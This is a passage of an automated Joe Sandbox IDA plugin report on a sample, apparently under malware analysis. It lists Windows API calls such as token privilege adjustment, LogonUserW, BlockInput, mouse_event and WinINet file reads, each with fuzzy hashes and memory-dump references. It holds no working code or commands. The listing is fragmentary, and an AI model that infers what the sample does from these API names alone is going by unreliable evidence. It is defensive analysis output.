                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: 7b64a089304b0a8c363e1eff407efe04a23c1c7be2348ee98f5696021ee45cf0
                                                    • Instruction ID: f84586f244f122583f39095fd9a1f8a93d6e2ad74adabf1508749081cc31f393
                                                    • Opcode Fuzzy Hash: 7b64a089304b0a8c363e1eff407efe04a23c1c7be2348ee98f5696021ee45cf0
                                                    • Instruction Fuzzy Hash: 28519F71504300AFD354EF24DC85E6BBBEAFF98710F50492DF49697292EB70AA04CB96
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0065EB19
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: 33c0d96d776ebc99fecc091858b2c580615592c6ae19c8160c4e244e6fe26806
                                                    • Instruction ID: aaeacd05f2f33c010723609f215a72e3bde31fbfacd5678128c95133bd0cd1d9
                                                    • Opcode Fuzzy Hash: 33c0d96d776ebc99fecc091858b2c580615592c6ae19c8160c4e244e6fe26806
                                                    • Instruction Fuzzy Hash: 26322775A006059FDB28CF19C481AAAB7F1FF48310F15C56EE89ADB3A1EB71E941CB44
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 006726D5
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0067270C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: 091ab6b98546224666d7cd60d359df0a3eb28bd878fba81d761cd4591bd5394b
                                                    • Instruction ID: 12ed75361ccfb0e2b386174da8ce73b6ccddc331034e333160ac9793b9cd5b7d
                                                    • Opcode Fuzzy Hash: 091ab6b98546224666d7cd60d359df0a3eb28bd878fba81d761cd4591bd5394b
                                                    • Instruction Fuzzy Hash: 1D41D57190420ABFEB20DF94DD95EFBB7FEEB40714F10806EF609A6240EA719E419B54
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066B5AE
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0066B608
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0066B655
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 9a29a7014935f8a2d1d3c95988abaf60841a798bd152cc0ec37d5dbdfc6e1b1d
                                                    • Instruction ID: 5e5db2d5d02896a7cf238be4bae527ee935dd7f37c2932d2558f3446eb522ac2
                                                    • Opcode Fuzzy Hash: 9a29a7014935f8a2d1d3c95988abaf60841a798bd152cc0ec37d5dbdfc6e1b1d
                                                    • Instruction Fuzzy Hash: BF216035A00118EFCB00EFA5D884AAEBBBAFF49310F1480A9E845EB351DB319955CF55
                                                    APIs
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00658D0D
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658D3A
                                                    • GetLastError.KERNEL32 ref: 00658D47
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: fd4c68df51a2500db3ed9438c6b5ae0fa360f69a6efcdfd78070a751ff6084ab
                                                    • Instruction ID: b8ef2610ea51c1eeff8b27d5be5c33dfe30b6464a629d25318ab816b557d3843
                                                    • Opcode Fuzzy Hash: fd4c68df51a2500db3ed9438c6b5ae0fa360f69a6efcdfd78070a751ff6084ab
                                                    • Instruction Fuzzy Hash: 1211BFB1414209AFE7289F54EC85D6BB7FEEF04711B20862EF84693641EF30AC408B60
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0066404B
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00664088
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00664091
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 2bb39d6c5ed19ec9b0119354dbc403cc877e1f2085064582f27f203994349d09
                                                    • Instruction ID: 5c0cbbf9ffa940249731d2e2f190a1b0f3d0df58dcb240c962465ef3b01b06c0
                                                    • Opcode Fuzzy Hash: 2bb39d6c5ed19ec9b0119354dbc403cc877e1f2085064582f27f203994349d09
                                                    • Instruction Fuzzy Hash: 7D117CB1900228BFE7109BE8DC48FABBBBDEB08710F000656BA04E7291C6745E4587A1
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00664C2C
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00664C43
                                                    • FreeSid.ADVAPI32(?), ref: 00664C53
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
                                                    • Instruction ID: 057f4673c1f98e589204f1ed6c5546c8fdbcab8206f9ab1e33836c929d79c745
                                                    • Opcode Fuzzy Hash: 0fa2c0d0168ba0c2820060aab546fd285c42db7c1b615d5bf26812d78cc50f15
                                                    • Instruction Fuzzy Hash: B8F06D75A1130CBFDF04DFF0DC99ABEBBBDEF08201F1045A9AA01E2281E7746A548B50
                                                    APIs
                                                    • __time64.LIBCMT ref: 00668B25
                                                      • Part of subcall function 0062543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006691F8,00000000,?,?,?,?,006693A9,00000000,?), ref: 00625443
                                                      • Part of subcall function 0062543A: __aulldiv.LIBCMT ref: 00625463
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID: 0ul
                                                    • API String ID: 2893107130-3446053954
                                                    • Opcode ID: e0bbf6076b817f2e7b453bb8a803ae22f034db9e41387408b6cfe936cee83196
                                                    • Instruction ID: 8218f15f7513b4687ab3d578d10b6226a80fa1ba6ff02e6b985842fb9061032f
                                                    • Opcode Fuzzy Hash: e0bbf6076b817f2e7b453bb8a803ae22f034db9e41387408b6cfe936cee83196
                                                    • Instruction Fuzzy Hash: 7321C0726255108FC329CF35D441AA2B3E2EBA4311B288E6CD0E5CB2D0CA74B905CB94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c5a5c15ccca11c1a6c93d054b7fc2283b74795f098b1f222a8a0a7be579e6b22
                                                    • Instruction ID: 645a790532ada6a05e9f935ced89b478f318a74e6fa88dc1d75e2ba28b334226
                                                    • Opcode Fuzzy Hash: c5a5c15ccca11c1a6c93d054b7fc2283b74795f098b1f222a8a0a7be579e6b22
                                                    • Instruction Fuzzy Hash: B0229274A40225CFDB28DF54C480AAFBBF2FF14300F148969E8569B391E776AD85CB91
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0066C966
                                                    • FindClose.KERNEL32(00000000), ref: 0066C996
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 07a1575ababaca6aeda2e63a55e7d512708bf97a9648b99d7442d9e6d697d10b
                                                    • Instruction ID: c3db59d2af347d306cf65c0b62605aa16c8c39b48e4405aae02192653bbddc27
                                                    • Opcode Fuzzy Hash: 07a1575ababaca6aeda2e63a55e7d512708bf97a9648b99d7442d9e6d697d10b
                                                    • Instruction Fuzzy Hash: BE11A1326106009FD710EF29C845A2BF7EAFF84320F04861EF8A9D7291DB30AC00CB95
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0067977D,?,0068FB84,?), ref: 0066A302
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0067977D,?,0068FB84,?), ref: 0066A314
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: e7fca79fb035a7ca6798352b55c157e414df17df93c25c5ed3971a9b05786bbe
                                                    • Instruction ID: a417b919b8cb6a1d63a28659831bc927a051f1188a1e189b4276dad0158d1352
                                                    • Opcode Fuzzy Hash: e7fca79fb035a7ca6798352b55c157e414df17df93c25c5ed3971a9b05786bbe
                                                    • Instruction Fuzzy Hash: 7EF0823554422DBBDB209FA4CC48FEA776EBF09761F004269B909E6281D6309940CBE1
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658851), ref: 00658728
                                                    • CloseHandle.KERNEL32(?,?,00658851), ref: 0065873A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: effba51f815404d7141df9c75028cfd4cb9e38c11e350dfcea21c5d1146a20a6
                                                    • Instruction ID: 94b1dfa9620679caf3c479a551f26e6cf6037a248fb844f70753019a46a84f4c
                                                    • Opcode Fuzzy Hash: effba51f815404d7141df9c75028cfd4cb9e38c11e350dfcea21c5d1146a20a6
                                                    • Instruction Fuzzy Hash: D2E04632004A51EFE7212B60FC08D777BAAEB04350B20892DB89680430CB22ACD0DB10
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00628F97,?,?,?,00000001), ref: 0062A39A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0062A3A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
                                                    • Instruction ID: 1d883a3215d42a99e09cffeced93c567c02d11e6a282e1bbdfda2c2b38d78416
                                                    • Opcode Fuzzy Hash: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
                                                    • Instruction Fuzzy Hash: 50B09231254308BBCB002B91EC09B883F6AEB46AA2F405120F60D84060CF6254508BD1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
                                                    • Instruction ID: ee7ea63d449d33365f2c4ca52b36f3001c7c3a147a73f6ae31f8e533ae4eb026
                                                    • Opcode Fuzzy Hash: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
                                                    • Instruction Fuzzy Hash: B7322721D29F114DD7235A34E832336A25EAFB73D4F15E737E819B5EAAEB29C4834500
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
                                                    • Instruction ID: bbb650e504f9260522b4531f3dcc80b0f75b07f7a88846259a3206b918415001
                                                    • Opcode Fuzzy Hash: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
                                                    • Instruction Fuzzy Hash: 53B1F030D2AF414DD7239A398831336BA9DAFBB6C5F51E71BFC2670D22EB2185834181
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00674218
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: e80d7b31626d97f4ee6c2439ad50fb207ae61fab4182b40868eb606d925c201a
                                                    • Instruction ID: b8c4018e7ca96c01d2fc4e952dd286a4e5b130c336f15c516729970e1069460d
                                                    • Opcode Fuzzy Hash: e80d7b31626d97f4ee6c2439ad50fb207ae61fab4182b40868eb606d925c201a
                                                    • Instruction Fuzzy Hash: 4BE012312401145FD710AF59D444A9AB7DAAF54760F008019F849C7352DA71A9418BA5
                                                    APIs
                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00664F18
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: 917fae9c328242fced50eeea2f831bab162fef1e373b34c419e32a1baaaaad39
                                                    • Instruction ID: 5ddcf5a298862a10383f71925c8e7aea61fa0f84127b65558737faf40ce24310
                                                    • Opcode Fuzzy Hash: 917fae9c328242fced50eeea2f831bab162fef1e373b34c419e32a1baaaaad39
                                                    • Instruction Fuzzy Hash: FED09EF416460579FD184B20AC2FFB6110BE3D1B91F9459897201965C19CF56861A075
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006588D1), ref: 00658CB3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
                                                    • Instruction ID: 9b3d629fd4761fee4c5312106b7507c25b69b6e53042291c7c6e86a9f9941d31
                                                    • Opcode Fuzzy Hash: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
                                                    • Instruction Fuzzy Hash: B6D09E3226450EBFEF019FA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00642242
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: c9bf59130bc7a708d94990519fd7aa68dc943db37e9dc0787b2253d7eee6c8c5
                                                    • Instruction ID: 87f6b6dce4f9f89e3c6749be290fa0d7989e1132e263b3e9ae7e5cadc7c540ed
                                                    • Opcode Fuzzy Hash: c9bf59130bc7a708d94990519fd7aa68dc943db37e9dc0787b2253d7eee6c8c5
                                                    • Instruction Fuzzy Hash: B9C048F1800109EBDB05DBA0DA98DEEB7BDAB08304F2081A6A102F2100E7749B848B72
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0062A36A
                                                    Memory Dump Source
